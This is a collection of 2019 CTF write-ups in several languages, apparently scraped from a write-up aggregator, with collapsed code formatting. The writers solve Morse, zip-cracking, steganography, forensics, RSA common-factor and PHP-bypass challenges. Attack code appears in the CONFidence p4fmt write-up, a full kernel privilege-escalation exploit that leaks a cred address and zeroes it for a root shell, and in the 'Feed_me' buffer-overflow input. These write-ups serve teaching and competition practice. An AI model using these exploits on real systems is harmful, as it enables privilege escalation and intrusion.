In Morse Code, dih, dit, and di represent a dot. Dah represents a dash. This is a Python script I whipped up to turn this phonetic Morse Code into dots-and-dashes Morse Code.
```python#!/usr/bin/env python3
with open("flag.txt", "r") as f: for char in f.read().split(): morse = "".join([ "." if "di" in c else "-" for c in char.split("-") ]) print(morse, end=" ")
print()```
When we plug it into a [Morse Code translator](https://morsecode.scphillips.com/translator.html), we seem to get back hexadecimal.
No problem. We'll just plug it into a [hexadecimal translator](https://www.rapidtables.com/convert/number/hex-to-ascii.html).
 |
**UTCTF 2019: Regular ZIPS**==================================
Challenge description:
In this challenge we only have a zip () and a txt file that contains : ^ 7 y RU[A-Z]KKx2 R4\d[a-z]B N$
The first step was to extract the zip file to know what is inside it, so we created a list of passwords that match with the regex in the first txt file.After extracting the first zip we got another zip with another txt that contains another regex, so we decided to automate the process in order to generate the passwords with the extracted regex, to finally get the flag.After several attempts we realized that the first zip contained a total of 1000 zips so we developed a script in python for the process.For this we use the exrex library (https://github.com/asciimoo/exrex).
```python#!/usr/bin/env python3
import exreximport zipfile
INITIAL_FILENAME = 'RegularZips.zip'INITIAL_HINT = "^ 7 y RU[A-Z]KKx2 R4\d[a-z]B N$"
def generate_dict(regex): return list(exrex.generate(regex))
def get_hint(iteration): with open(str(iteration) + "/hint.txt") as f: return f.read()
def unzip_and_get_hint(iteration, filename, regex_dict): zip_ref = zipfile.ZipFile(filename, 'r') for passwd in regex_dict: try: zip_ref.extractall(str(iteration), pwd=bytes(passwd,'UTF-8')) except Exception as e: continue print("[{}] Password found! - {}".format(iteration, passwd)) zip_ref.close() hint = get_hint(iteration) print("\tHint: - {}".format(hint)) return hint
if __name__ == "__main__": dictionary = generate_dict(INITIAL_HINT) filename = INITIAL_FILENAME i = 0 while True: hint = unzip_and_get_hint(i, filename, dictionary) dictionary = generate_dict(hint) filename = "{}/archive.zip".format(i) i += 1``` Finally at the end we obtained the flag : utflag{bean_pure_omission_production_rally} |
# Welcome
## Таска
Do you think this is a normal image? No! Dig deeper to find out more.....
## Решение
Такс, ну понятное дело, первым делом я загнал картинку в Stegsolve, но там ничего интересного не обнаружилось. Поэтому я решил взглянуть на неё в хексе. Вот там уже картинка повеселее:
Видим заголовок .zip архива. Аккуратно вырезаем архив и сохраняем в новом файлике. Распаковываем, а там еще один архив, ха. Распаковываем его тоже. А в нём... опять архив, но еще и secret.bmp.
Ну мы уж и не смотрим на секрет, а рвёмся распаковывать zip. А не тут-то было, архивчик-то запаролен:
Ну ладно, смотрим чё там в картинке:
Ой. Ясненько, смотрим хексы:
А это вообще не файл, каша какая-то. Но в конце есть кусочек подозрительно похожий на Base64. Декодируем, и:
Чё за... Так, спокойствие, а если убрать "==" с конца:
Во, а вот и пароль. Распаковываем архив и видим картинку:
Пихаем её сразу в Stegsolve и вуаля:
 |
# CONFidence CTF 2019 Teaser## p4fmt#### Flag: p4{4r3_y0U_4_81n4ry_N1njA?}### The challenge* The files```.├── bzImage├── initramfs.cpio.gz└── run.sh```* run<span></span>.sh:```sh#!/bin/bashqemu-system-x86_64 -kernel ./bzImage \ -initrd ./initramfs.cpio.gz \ -nographic \ -append "console=ttyS0" \```Extract the content of rootfs:```shellgunzip initramfs.cpio.gz && cpio -idmv < initramfs.cpio```rootfs:```...├── bzImage├── dev├── etc│ └── passwd├── flag├── home│ └── pwn├── init├── p4fmt.ko├── proc├── run.sh├── sbin├── sys├── tmp└── usr ├── bin └── sbin
12 directories, 399 files```The `flag` and kernel module `p4fmt.ko` are placed in the root directory.```sh/ $ ls -l flag-rw------- 1 root 0 28 Mar 15 21:38 flag```Only root can read the flag, therefore our the goal is privilege escalation obviously.
init:```#!/bin/sh
mount -t proc none /procmount -t sysfs none /sys
insmod /p4fmt.ko
sleep 2
ln -s /dev/console /dev/ttyS0
cat <<EOF====================p4fmt====================
Kernel challs are always a bit painful.No internet access, no SSH, no file copying.
You're stuck with copy pasting base64'd (sometimes static) ELFs.But what if there was another solution?
We've created a lightweight, simple binary format for yourpwning pleasure. It's time to prove your skills.
EOF
setsid cttyhack su pwnpoweroff -f```### p4fmt.koIt's a simple kernel module:```c__int64 load_p4_binary(linux_binprm *_bprm){ ...}__int64 p4fmt_init(){ _register_binfmt(&p4format, 1LL); return 0LL;}
__int64 p4fmt_exit(){ return unregister_binfmt(&p4format);}```It register a new binary format for p4 binary, and `load_p4_binary` is similar with `load_elf_binary` but for p4 format.
### load_p4_binaryIt first check whether the binary file is start with `"P4"`, if not it will return `-ENOEXEC`.After some reversing on the function, we can simply figure out the file format of p4 binary:```cstruct p4fmt{ char magic[2] = "P4"; int8_t version; int8_t arg; int32_t load_count; int64_t header_offset; // offset to loads int64_t entry; char _gap[header_offset - 0x18]; struct load loads[load_count];}
struct load{ int64_t addr; int64_t length; int64_t offset;};```Version should be 0, otherwise it will `printk("Unknown version")`. There are two loading method determined by `arg`. If arg be 1, it will load the `address, length, offset` from header and do `vm_mmap`.We can generate a simple Hello World p4 binary:```pythonbinary = 'P4' # MAGICbinary += p8(0) # versionbinary += p8(1) # argbinary += p32(1) # load_countbinary += p64( 0x18 ) # header_offsetbinary += p64( 0x400080 ) # entrybinary += p64( 0x400000 | 7 ) + p64( 0x1000 ) + p64( 0 ) # addr , length , offsetbinary = binary.ljust( 0x80 , '\0' ) # 128binary += asm( shellcraft.echo( 'Hello World!' ) + shellcraft.exit(0))```Result:```sh/tmp $ ./hello_word[ 22.679510] vm_mmap(load_addr=0x400000, length=0x1000, offset=0x0, prot=7)Hello World!/tmp $```### VulnerabilityFirst I thought whether can do something with `vm_mmap`, because there was no checking for the arguments, but there were `MAP_PRIVATE` and `ADDR_LIMIT_32BIT` flags, so it seemed like nothing to do.
After then, take a look at `struct linux_binprm`:```Cstruct linux_binprm { char buf[BINPRM_BUF_SIZE]; struct vm_area_struct *vma; unsigned long vma_pages; struct mm_struct *mm; unsigned long p; /* current top of mem */ unsigned long argmin; /* rlimit marker for copy_strings() */ unsigned int called_set_creds:1, cap_elevated:1, secureexec:1; unsigned int recursion_depth; /* only for search_binary_handler() */ struct file * file; struct cred *cred; /* new credentials */ int unsafe; /* how unsafe this exec is (mask of LSM_UNSAFE_*) */ unsigned int per_clear; /* bits to clear in current->personality */ int argc, envc; const char * filename; /* Name of binary as seen by procps */ const char * interp; unsigned interp_flags; unsigned interp_data; unsigned long loader, exec; struct rlimit rlim_stack; /* Saved RLIMIT_STACK used during exec. */};```Binary header will be stored to `bprm->buf[]`, and the part of `load_p4_binary` where it process memory loading:```cif ( (p4fmt)(bprm->buf).arg > 1u ) return (unsigned int)-EINVAL;retval = flush_old_exec(bprm, P4MAG);if ( !retval ){ current->personality = 0x800000; setup_new_exec(bprm); arg = (p4fmt)(bprm->buf).arg; if ( arg ) { if ( arg != 1 ) return (unsigned int)-EINVAL; if ( (p4fmt)(bprm->buf).load_count ) { loads = (load *)&buf->magic[ (p4fmt)(bprm->buf).header_offset ]; do { addr = loads->addr; prot = loads->addr & 7LL; base = loads->addr & 0xFFFFFFFFFFFFF000LL; printk("vm_mmap(load_addr=0x%llx, length=0x%llx, offset=0x%llx, prot=%d)\n", base, loads->length, loads->offset, prot); offset = loads->offset; length = loads->length; if ( addr & 8 ) { vm_mmap(0LL, base, length, prot, 2LL, offset); printk("clear_user(addr=0x%llx, length=0x%llx)\n", loads->addr, loads->length); _clear_user(loads->addr, loads->length); } else { vm_mmap(bprm->file, base, length, prot, 2LL, offset); } ++retval; ++loads; }while ( (p4fmt)(bprm->buf).load_count > retval ); } } else{
.....```The problem is that it does not has bounds checking for `header_offset` and `load_count`, we can use `header_offset` to control the pointer:`loads = (load *)&buf->magic[ (p4fmt *)(bprm->buf).header_offset ];`,and over reading memory by setting up `load_count`, therefore we can leak the content in `struct linux_binprm`.
PoC:```pythonbinary = 'P4' # MAGICbinary += p8(0) # versionbinary += p8(1) # argbinary += p32( 5 ) # load_countbinary += p64( 0x80 - 0x18 ) # header_offset```Result:```sh/tmp $ ./leak[ 7.607129] vm_mmap(load_addr=0x0, length=0x0, offset=0x0, prot=0)[ 7.607460] vm_mmap(load_addr=0x7fffffffe000, length=0x100000001, offset=0x0, prot=3)[ 7.607952] vm_mmap(load_addr=0xffff9f160213d000, length=0x0, offset=0x7fffffffeff1, prot=0)[ 7.608132] vm_mmap(load_addr=0x0, length=0xffff9f16020c8b40, offset=0x800000, prot=0)[ 7.608315] vm_mmap(load_addr=0xfffffffffffff000, length=0x1, offset=0x0, prot=7)[ 7.608561] clear_user(addr=0xffffffffffffffff, length=0x1)[ 7.610219] leak[526]: segfault at 0 ip 0000000000000000 sp 00007fffffffef93 error 14[ 7.610786] Code: Bad RIP value.Segmentation fault/tmp $```### Privilege escalationFor now, we can use kernel information leak to bypass kaslr, but how to achieve privilege escalation.We can simplify the process of `load_p4_binary`:1. Check for file format.2. `flush_old_exec(bprm, P4MAG)`3. `setup_new_exec(bprm)`4. Process memory loading.5. `install_exec_creds(bprm)`6. `set_binfmt(&p4format)`7. `setup_arg_pages(bprm, randomize_stack_top(STACK_TOP), 0LL)`8. `finalize_exec(bprm)`9. `start_thread(regs, p4_entry, bprm->p)`
`install_exec_creds(bprm)` is interesting, it will do `commit_creds(bprm->cred);` inside.```cvoid install_exec_creds(struct linux_binprm *bprm){ security_bprm_committing_creds(bprm);
commit_creds(bprm->cred); bprm->cred = NULL;
if (get_dumpable(current->mm) != SUID_DUMP_USER) perf_event_exit_task(current);
security_bprm_committed_creds(bprm); mutex_unlock(¤t->signal->cred_guard_mutex);}```We are already able to leak the address of `struct cred *cred` in `struct linux_binprm *bprm`, and the `struct cred`:```cstruct cred { atomic_t usage; kuid_t uid; /* real UID of the task */ kgid_t gid; /* real GID of the task */ kuid_t suid; /* saved UID of the task */ kgid_t sgid; /* saved GID of the task */ kuid_t euid; /* effective UID of the task */ kgid_t egid; /* effective GID of the task */ kuid_t fsuid; /* UID for VFS ops */ kgid_t fsgid; /* GID for VFS ops */ unsigned securebits; /* SUID-less security management */ kernel_cap_t cap_inheritable; /* caps our children can inherit */ kernel_cap_t cap_permitted; /* caps we're permitted */ kernel_cap_t cap_effective; /* caps we can actually use */ kernel_cap_t cap_bset; /* capability bounding set */ kernel_cap_t cap_ambient; /* Ambient capability set */ ...```If we can overwrite the `uid` and `gid` in `bprm->cred` before calling `install_exec_creds`, so that it would install the new `cred`!
But how to set the `uid` and `gid` to zero, remember there is a funtion named `_clear_user()`:```Nameclear_user — Zero a block of memory in user space.
Synopsisunsigned long clear_user (void __user * to, unsigned long n);```There is `_clear_user(loads->addr, loads->length);` in `load_p4_binary` where `loads->addr` and `loads->length` are controllable, that means we can zero a block of memory everywhere. That's awesome!### ConstraintsAlthough we are able to leak the memory, but we can't do the leak and setting up header at the same time with the same binary.Execute another time, the address of `cred` has some random offset, but I found the interesting thing:```[+] cred -> 0xffff99cb021fa180[+] cred -> 0xffff99cb021faf00[+] cred -> 0xffff99cb021fab40[+] cred -> 0xffff99cb021faa80[+] cred -> 0xffff99cb021facc0
[+] cred -> 0xffff99cb021fa180[+] cred -> 0xffff99cb021faf00[+] cred -> 0xffff99cb021fab40[+] cred -> 0xffff99cb021faa80[+] cred -> 0xffff99cb021facc0```The address will be the same when execute the binary every five times, don't know the reason...
### ExploitGenerate a p4 binary for kernel memory leak first, then set up loads header of second p4 binary to trigger `_clear_user( bprm->cred | 8 + 0x10 , 0x48 ); // +0x10 prevent crashing caused by the NULL pointer`.`install_exec_creds(bprm)` will call `commit_creds(bprm->cred);` and process our new `bprm->cred`, then execute our p4 binary with root privilege!Execute shellocde and enjoy the root shell :D
### Root shell
exploit:```python#!/usr/bin/env pythonfrom pwn import *import base64import re
# p4{4r3_y0U_4_81n4ry_N1njA?}
context.arch = 'amd64'host , port = 'p4fmt.zajebistyc.tf' , 30002y = remote( host , port )
def gen_p4_binary( version = 0 , arg = 1 , section_header_offset = 0x18 , sections_len = 0 , entry = 0 , sections = [] , code = '' ): b = 'P4' # MAGIC b += p8( version ) + p8( arg ) + p32( sections_len ) + p64( section_header_offset ) + p64( entry ) b += ''.join( flat(s) for s in sections ) if code: b = b.ljust( entry & 0xfff , '\0' ) b += code return b
def sp( cmd ): y.sendlineafter( '$' , cmd )
def leak(): sp( './leak' ) y.recvuntil( 'length=' ) cred = int( y.recvuntil( ',' )[:-1] , 16 ) success( 'cred -> %s' % hex( cred ) ) return cred
sp( 'cd /tmp' )
p4 = gen_p4_binary( section_header_offset = 0x90 , sections_len = 1 )sp( "echo %s | base64 -d > ./leak" % ( base64.b64encode( p4 ) ) )sp( 'chmod +x ./leak' )cred = leak() # 1
p4 = gen_p4_binary( sections = [[0x7000000 | 7, 0x1000, 0], [cred | 8 + 0x10, 0x48, 0]] , sections_len = 2 , entry = 0x7000090 , code = asm( shellcraft.sh() ) )sp( 'printf \'\\%s\' > ./pwn' % '\\'.join( oct( ord( _ ) )[1:].rjust( 3 ,'0' ) for _ in p4 ) )sp( 'chmod +x ./pwn' )
'''[+] cred -> 0xffff99cb021fa180[+] cred -> 0xffff99cb021faf00[+] cred -> 0xffff99cb021fab40[+] cred -> 0xffff99cb021faa80[+] cred -> 0xffff99cb021facc0
[+] cred -> 0xffff99cb021fa180[+] cred -> 0xffff99cb021faf00[+] cred -> 0xffff99cb021fab40[+] cred -> 0xffff99cb021faa80[+] cred -> 0xffff99cb021facc0'''
for _ in range(3): leak()
sp( './pwn' ) # cred should be the same as first leak
y.sendlineafter( '/tmp #' , 'cat /flag' ) # root !
y.interactive()``` |
# myBrokenBash
## AboutIn this challenge we were provided with a simple echo service.You could connect to it:
```bashnc mybrokenbash.insomni.hack 1337```And afterwards send some text which got repeated.
## Step 1: Prison breakI was able to break out of the jail by providing the following input:
```bashexec > /dev/tty```Now we spawned a regular bash shell.
## Step 2: Deeply hiddenWhen listing the files I found one called flag:
```bashlsbin dev flag lib media opt root sbin sys usrboot etc home lib64 mnt proc run srv tmp var```
But it didn't reveal everything yet:```bashcat flagalmost there ;-)_1t_s_n0t_so_ea4y}```
Now I only needed to print the 'full' file not only the characters after the carriage return:
```bashcat -A flagINS{c@t_th3_Flag_1t_s_n0t_so_ea4y}^Malmost there ;-)$```
Flag: INS{c@t_th3_Flag_1t_s_n0t_so_ea4y}
## Bonus
Here's the binary I extracted :
```bash[0x000008c0]> pdf @ main/ (fcn) main 116| main (int argc, char **argv, char **envp);| ; var int canary @ rbp-0x8| ; DATA XREF from entry0 (0x8dd)| 0x00000ab4 55 push rbp| 0x00000ab5 4889e5 mov rbp, rsp| 0x00000ab8 4883ec10 sub rsp, 0x10| 0x00000abc 64488b042528. mov rax, qword fs:[0x28] ; [0x28:8]=0x1138 ; '('| 0x00000ac5 488945f8 mov qword [canary], rax| 0x00000ac9 31c0 xor eax, eax| 0x00000acb b800000000 mov eax, 0| 0x00000ad0 e84bffffff call sub.dev_urandom_a20| 0x00000ad5 488d3dec0000. lea rdi, str.Welcome_to__INS19 ; 0xbc8 ; "*** Welcome to #INS19!! ***\n" ; const char *s| 0x00000adc e86ffdffff call sym.imp.puts ; int puts(const char *s)| 0x00000ae1 488d3dfd0000. lea rdi, str.cat_the_flag_here_please ; 0xbe5 ; "cat the flag here please ;-)" ; const char *s| 0x00000ae8 e863fdffff call sym.imp.puts ; int puts(const char *s)| 0x00000aed bf01000000 mov edi, 1 ; int fildes| 0x00000af2 e879fdffff call sym.imp.close ; int close(int fildes)| 0x00000af7 bf02000000 mov edi, 2 ; int fildes| 0x00000afc e86ffdffff call sym.imp.close ; int close(int fildes)| 0x00000b01 488d3dfa0000. lea rdi, str.bin_sh ; 0xc02 ; "/bin/sh" ; const char *string| 0x00000b08 e853fdffff call sym.imp.system ; int system(const char *string)| 0x00000b0d b800000000 mov eax, 0| 0x00000b12 488b55f8 mov rdx, qword [canary]| 0x00000b16 644833142528. xor rdx, qword fs:[0x28]| ,=< 0x00000b1f 7405 je 0xb26| | 0x00000b21 e832fdffff call sym.imp.__stack_chk_fail ; void __stack_chk_fail(void)| | ; CODE XREF from main (0xb1f)| `-> 0x00000b26 c9 leave\ 0x00000b27 c3 ret``` |
# Hidden
__PROBLEM__
My friend asked me to find his hidden flag in this link .. Can you help me?
[Link](https://misc1.ctfsecurinets.com/)
__SOLUTION__
When I tried to visit the website firfox popped up an error about some trusting issue on the certificate and there it was the flag.
FLAG `Securinets{HiDDeN_D@tA_1n_S3IF_S3iGnEd_CeRtif1Cates}`
|
# Pragyan CTF 2019 "Mandatory PHP" writeup
## 問題
## 解法
ページにアクセスすると↓のようなソースコードが。(見やすいように少し整形済み)GETの引数にval1～val4まで与えて、適切なやつだとフラグがゲットできるってやつ。
```php0&&$d>0&&$d>$c&&$a==$c*$c+$d*$d) $s1="true";else die("Bye...");if($s1==="true") echo $flag1;for($i=1;$i<=10;$i++){ if($b==urldecode($b)) die('duck'); else $b=urldecode($b);} if($b==="WoAHh!") $s2="true";else die('oops..');if($s2==="true") echo $flag2;die('end...');?>Bye...```
まずはのif文を突破することを考える。
```php$a=hash("sha256",$a);$a=(log10($a**(0.5)))**2;if($c>0&&$d>0&&$d>$c&&$a==$c*$c+$d*$d) $s1="true";else die("Bye...");```
自鯖で動作させてたら$aに"a"を放り込むと```php$a=hash("sha256",$a);$a=(log10($a**(0.5)))**2;```で$aがINFになることを発見。あとは```$c*$c + $d*$d```もINFになるように調整。具体的にはval3 (```$c```)には1を、val4(```$d```)には7E1000を入れてみたらOKが出た。
これで半分突破。
次は```$b```を10回urldecodeにかけたらWoAHh!になる文字列を考える。
```phpfor($i=1;$i<=10;$i++){ if($b==urldecode($b)) die('duck'); else $b=urldecode($b);} if($b==="WoAHh!") $s2="true";else die('oops..');```
直感的にこれはパーセントエンコードだろうと分かったのでWをパーセントエンコードしてやっていけば解けた。具体的には%25がurldecodeされると%になるので繰り返し繰り返しやっていって最後の%57でWに変換される```%2525252525252525252557oAHh!```。
|
# Contact me
__PROBLEM__
People think it's hard to stay without a phone, but I don't! My computer has everything a smartphone has like browsers, notes, calendars, and a lot more.
[Link](http://www.mediafire.com/file/1x0ynlrcg3gc0t1/contact_me.zip/file)
__SOLUTION__
First I was trying lot of big guns like volatility and testdisk and all of those were failing and then admin said stick to the basics.
So basics of forensics are `exiftool` or `strings`, now exiftool didn't gave anything worth so I tried `strings`
```bash➜ strings contact_me | grep -i -C 20 "securinets"
Tuuid^teamIdentifierWoptionsWversionZwebpageURL_eligibleForSearch_dynamicActivityType\activityType_eligibleForPublicIndexingTtypeUtitle]contentAction^expirationDateXkeywords_eligibleForHandoffV$class\payloadError_eligibleForReminders012WNS.keysZNS.objects4567Z$classnameX$classes\NSDictionary68XNSObject_;c2VjdXJpbmV0c3szMTAxMmUxNmMzZTVkZmE3ZTY3MzYxMmQ3ZDA3NTcxNX0_com.apple.Notes.sharesheetP45=>_UAUserActivityInfoUAUser_--
```
There's this base64 strings which is long enough to be the flag.
```bash➜ echo "c2VjdXJpbmV0c3szMTAxMmUxNmMzZTVkZmE3ZTY3MzYxMmQ3ZDA3NTcxNX0" | base64 -dsecurinets{31012e16c3e5dfa7e673612d7d075715}```FLAG - `securinets{31012e16c3e5dfa7e673612d7d075715}` |
# Challenge
> Feed_me
> 150 point
> Can you cook the most delicious recipe?
> nc 159.89.166.12 9800
> file: challenge1
# Solution
### 1. デコンパイルツール(Ghidra)を使ってCのコードに変換するこれについてtakachimaくんがやってくれた．デコンパイルされたコードはGitのリポジトリに置いた．というかデコンパイルされたコードが共有されたからこの問題に手を出した．
### 2. コードを読んでFlagを入手出来る条件を理解するコードの重要な部分からたどって読んでいく．Cになっているのでこの作業は大分楽である．このプログラムは以下の動作を行う．
1. 3つのint型変数，iVar4, iVar5, iVar6と3つのchar型配列local_76[10], local_6c[10], local_62[10]を定義する．なお，これ以降簡単化のため，int型変数をそれぞれA,B,C char型配列をされぞれx,y,zとする．2. 現在時刻をシード値として 0 ～ -19998のランダムな偶数を3つ決めて，A,B,Cに格納する．3. **scanf**を使ってユーザーからの入力を受け付ける．入力をxに格納する（y, zには格納しない）．4. if(A == x+y), if(B==y+z), if(C==z+x)が満たさればFlagを出力して，そうでないならば失敗のメッセージを出力する．その後終了する．
プログラム以下の部分からフラグの入手方法が分かる．ここで，f(A == x+y), if(B==y+z), if(C==z+x)という条件文をすべて満たせばフラグが獲得出来ることが理解出来る．``` do { sVar8 = strlen(local_76); if (sVar8 <= (ulong)(long)local_9c) { iVar4 = atoi(local_76); iVar5 = atoi(local_6c); iVar6 = atoi(local_62); if (uVar1 == iVar5 + iVar4) { if (uVar2 == iVar6 + iVar5) { if (uVar3 == iVar4 + iVar6) { __stream = fopen("flag.txt","r"); if (__stream == (FILE *)0x0) { fwrite("\nflag.txt doesn\'texist.\n",1,0x19,stderr); /* WARNING: Subroutine does notreturn */ exit(0); } fgets(local_58,0x32,__stream); printf("That\'s yummy.... Here is yourgift:\n%s",local_58); } else { fail(); } } else { fail(); } } else { fail(); }```
次に，A, B, C, x, y, zがどのようにして決まるかを見ていく．A,B,Cはプログラム側がランダムに決めることが分かる．そして同時に，取りうる範囲が0 ～ -19998の偶数であることも分かる．``` tVar7 = time((time_t *)0x0); srand((uint)tVar7); iVar4 = rand(); uVar1 = (iVar4 % 10000) * -2; iVar4 = rand(); uVar2 = (iVar4 % 10000) * -2; iVar4 = rand(); uVar3 = (iVar4 % 10000) * -2;
```
xは`__isoc99_scanf(&DAT_00100de2,local_76);`の1文によってユーザーから入力される．`__isoc99_scanf`は標準入力から値を受け取るscanf関数である．y, zはプログラムないでは変更されない(左辺にこない)．y, zを適切にさだめなければFlagはとれないが，y,zに値を入れる方法はない．ここで変数宣言部を見てみるとchar型配列のx,y,zは連続して宣言されている．
``` int local_9c; char local_76 [10]; char local_6c [10]; char local_62 [10]; char local_58 [56]; long local_20;```ここで，scanfでバッファオーバーフローを起こしてy,zに値を入れられるのでは？と思った．
### 3. バッファオーバーフローを利用して３つの変数にあを格納する入力された値はatoi関数で数値化されるので，ここにいい感じの数値を打ち込んでやればいい．各変数の配列長は10なので，余っている部分は0埋めする．
x,y,zの条件は，if文を等式とみなして連立方程式を解くと- x = 1/2(A-B+C)- y = 1/2(A+B-C)- z = 1/2(-A+B+C)であることが分かる．あ^～，だからA,B,Cは2の倍数だったんですね．
それを踏まえて入力．．．```$ nc 159.89.166.12 9800Can you cook my favourite food using these ingredients :)-1530 ; -4376 ; -15962 ;-0000065580000005028-000009404No, I dont want this... :(```
あれ～おかしいね旗取れないね: と思ったら数字が偏っているせいでxとyが１つの数字として認識されてしまっている．もう１度トライ．
```$ nc 159.89.166.12 9800Can you cook my favourite food using these ingredients :)-11014 ; -10620 ; -13566 ;-000006980-000004034-000006586That's yummy.... Here is your gift:pctf{p1zz4_t0pp3d_w1th_p1n34ppl3_s4uc3}```
# Clue- atioは記号を認識してくれるので数字偏っても先頭に+をつければ分けてくれると思う |
Maze was a fun cryptography challenge which wasn't all that challenging once i figured out what I had to do. That took me a while though!
# The challenge
We're given, in a zip file:
- A `cipher.txt` file which contains a big number (the cipher, supposedly)- 101 public keys
And that's it, we have to decipher it. Oof, that's not a whole lot of information.
# Examining the data
I decided to look at the modulus and exponents in each file, moved all the decoded files to a `clear/` folder with this command:`for file in pub*; do openssl rsa -pubin -inform PEM -text -noout < $file > "./clear/$file"; done`
Ok so now I have 101 files that look like:
```RSA Public-Key: (2048 bit)Modulus: 00:dd:a2:f9:b5:2c:68:3f:35:bc:41:da:f5:26:b2: 49:6e:da:c0:59:ed:04:90:71:49:a9:71:8c:33:72: 71:50:64:20:7e:24:fa:b0:6c:33:d0:eb:c2:5a:d5: 4f:fa:48:e7:cf:e1:5f:54:b5:97:1a:0f:f0:be:3d: 0d:a8:b1:10:0a:d1:77:88:87:a1:9c:9e:29:49:bd: 5f:82:4f:b2:1f:4d:68:85:c8:14:52:6f:27:23:f5: 56:ce:29:b3:06:bf:59:bd:43:cc:a1:1d:ea:fe:20: d0:db:b8:46:ce:ed:18:44:09:74:cd:8b:f4:94:5d: f1:fb:5c:01:f7:91:ac:63:1a:19:b2:8d:d1:67:2a: cd:ea:08:ce:7d:e9:65:e9:95:bb:06:3c:61:38:15: 98:f9:3f:81:6e:dc:b6:26:8e:e5:a2:92:43:a0:3b: e7:39:74:60:b2:3a:74:44:eb:00:fc:42:00:bc:95: d1:17:d9:30:a3:13:1c:fa:8d:95:22:60:a1:bc:bb: 46:af:4c:52:a6:7c:5c:df:d3:4b:09:66:c8:d6:9f: 82:0f:4f:25:bd:e5:04:46:b4:c8:c0:70:8c:2a:39: 3a:04:67:d4:e3:51:b6:66:2d:46:25:99:54:a2:5e: 21:2a:44:65:be:a7:ed:a9:f9:51:1c:b1:f4:69:c4: e7:29Exponent: 65537 (0x10001)```
I wasted _way_ too much time establishing these few basic facts:
- Every file has a different modulus- Every file has the same exponent
# Trying to solve it
## Options options options
So I had to figure out what was up with all these files. I had a few possibilities to explore:
- All of these were all public keys derivated from the same private key and I had to somehow find the private key from all these files- The ciphertext had been encrypted using all of these public keys- A single one of those keys was used to encrypt the plaintext and I somehow have to find which one
Option #1 was basically impossible, and wouldn't have helped me anyway. I was pretty set on option #2 but before doing my script I decided to ask an admin since the math involved might lose me a lot of time. He told me I was on the wrong track. So... It has to be #3.
## Common factor attack
I hadn't known of Common Factor Attack before this chall, I don't know how I didn't! It's really powerful, though not very applicable to real-world keys. The idea is that if you have a bunch of keys that were generated by the same source, that was using really bad values for its prime generation for `p` and `q`, then there's a chance both keys have **one of those prime numbers in common**. And that's really good news because we can calculate `gcd` between large integers very fast! So, first of all, write a sagemath script that reads all of the modulus and puts them in a file:
```pyvals = []
cipher = 12225682126551187619399843891561465899608952498495120851070778192443023261485900560363269700242510941697365921981918056191408738905974825435324679841994232057252389709580959723999122054844144379187848417389566267322902673441312265008128249280701778727420570269893119286011513549800540500264752909082405313097299590601819529975638766522951170517766409850156769569563924473524368177233982270360715976884639307240445794551655637991803019693125040126171348043927410721121473304998359286936518573367417946711868112216965614586268606230443139176878435753744068734717043992817907788262531021387616180516736397859628481024223e = 65537
for n in range(101): f = open("pub{}.pem".format(n), 'r') lines=[x.rstrip().lstrip() for x in f.readlines()[2:-1]] hexa = '' for part in lines: hexa += part.replace(":", "") val = Integer(int(hexa, 16)) if cipher < val: vals.append(val)
# vals now contains all modulus```
Ok cool, now to check if 2 modulus have common factors:
```py# Find keys that share common factorsfor x in range(len(vals)): for y in range(x+1, len(vals)): if x == y: continue valX = vals[x] valY = vals[y] g = gcd(valX, valY) if g == 1: continue print("{} and {} share a common factor: {}".format(x, y, g))```
And the output:`38 and 44 share a common factor: 168736462866079204789584058199620418225526506348478399447895958829038354002285480486576728303147995561507709511105490546002439968559726489519296139857978907240880718150991015966920369123795034196767754935707681686046233424449917085120027639055362329862072939086970892956139024391556483288415208981014264336691`
Boom! Now we have a `p` value, we can compute `q` for both moduli and that's it, we've broken both private keys. All we need now is to decipher the ciphertext with both private keys and see which of the two make sense:
```pyp = Integer(168736462866079204789584058199620418225526506348478399447895958829038354002285480486576728303147995561507709511105490546002439968559726489519296139857978907240880718150991015966920369123795034196767754935707681686046233424449917085120027639055362329862072939086970892956139024391556483288415208981014264336691)
for i in [38, 44]: n = vals[i] # Find q q = n // p # Comute Lambda(n): l = lcm(p-1, q-1) # Compute d d = inverse_mod(e, l) # Calculate (cipher^d) % n R = IntegerModRing(n) plaintext = R(cipher) plaintext = plaintext ^ d print(hex(Integer(plaintext)))```
One of the two outputted values looks a LOT like ASCII, so I convert it and:`securinets{rs4_1s_g00d_s0m3t1m3s!}`
That's it! |
# Cat hunting
__PROBLEM__
We got an anonymous note that a student is downloading illegal contents like 'cat pictures' ! We confiscated his PC and got a memory dump before returning it. Your job now is to follow his traces and find out how he gets them.
[Link](http://www.mediafire.com/file/60dkm1poq7uy2oo/cat_hunting.zip/file)
__SOLUTION__
This was very bad challenges maybe because of the description or I don't know what but it was just bad.
Wasted few hours after that we found the right path.
So we are given the memdump so let start with simple `imageinfo`
```bash➜ vol.py -f cat_hunting imageinfoVolatility Foundation Volatility Framework 2.6INFO : volatility.debug : Determining profile based on KDBG search... Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_23418 AS Layer1 : WindowsAMD64PagedMemory (Kernel AS) AS Layer2 : FileAddressSpace (/home/mzfr/Downloads/cats/cat_hunting) PAE type : No PAE DTB : 0x187000L KDBG : 0xf800027f90a0L Number of Processors : 1 Image Type (Service Pack) : 1 KPCR for CPU 0 : 0xfffff800027fad00L KUSER_SHARED_DATA : 0xfffff78000000000L Image date and time : 2019-03-20 14:27:22 UTC+0000 Image local date and time : 2019-03-20 15:27:22 +0100```
So let's do the `pstree` to see what all process are running:
We can see that firefox is running and if someone was downloading an image it must be through the browser. So let's dump firefox history by using the firefoxhistory plugin.
I tried but I got nothing. I tried dumping the firefox process but failed. Tried looking into the memory of the dump but nothing.
Then after some time we decided to trace back the firefox, see what trace it has left.
Running netscan, gives us the `IP`
I tried that IP and that host was up and I was prompted a login page.
If the host is up and we were asked to find the origin of the images in the description then we might have to login to get the flag. But in order to do so we need logins. Let's try `mimikatz` plugin.
Now we have the creds and the url so we login into the account and find lot of images there but one wasn't rendering properly.
So we visit the URL and save it and after opening that file we get a b64
```c2VjdXJpbmV0c3tkMjU3MzZmZWJmZDgwOWVjNGViYTc2YjBhYWU5ZWFiMH0K```
Decode it
```bash➜ echo "c2VjdXJpbmV0c3tkMjU3MzZmZWJmZDgwOWVjNGViYTc2YjBhYWU5ZWFiMH0K" | base64 -dsecurinets{d25736febfd809ec4eba76b0aae9eab0}```
FLAG - <span>`securinets{d25736febfd809ec4eba76b0aae9eab0}`</span> |
